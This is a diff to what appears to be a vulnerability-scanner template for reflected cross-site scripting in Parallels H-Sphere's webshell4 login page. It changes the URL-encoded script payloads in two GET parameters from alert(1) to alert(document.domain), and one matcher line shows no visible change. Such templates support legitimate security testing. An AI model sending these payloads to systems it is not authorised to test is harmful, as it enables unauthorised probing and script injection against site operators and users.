diff --git a/vulnerabilities/other/parallels-hsphere-xss.yaml b/vulnerabilities/other/parallels-hsphere-xss.yaml index 9f5aeb6aa9..73f5f1bea5 100644 --- a/vulnerabilities/other/parallels-hsphere-xss.yaml +++ b/vulnerabilities/other/parallels-hsphere-xss.yaml @@ -16,8 +16,8 @@ info: requests: - method: GET path: - - '{{BaseURL}}/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E' - - '{{BaseURL}}/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E' + - '{{BaseURL}}/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + - '{{BaseURL}}/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' stop-at-first-match: true matchers-condition: and @@ -25,7 +25,7 @@ requests: - type: word words: - - 'value="\">' + - 'value="\">' - type: word part: header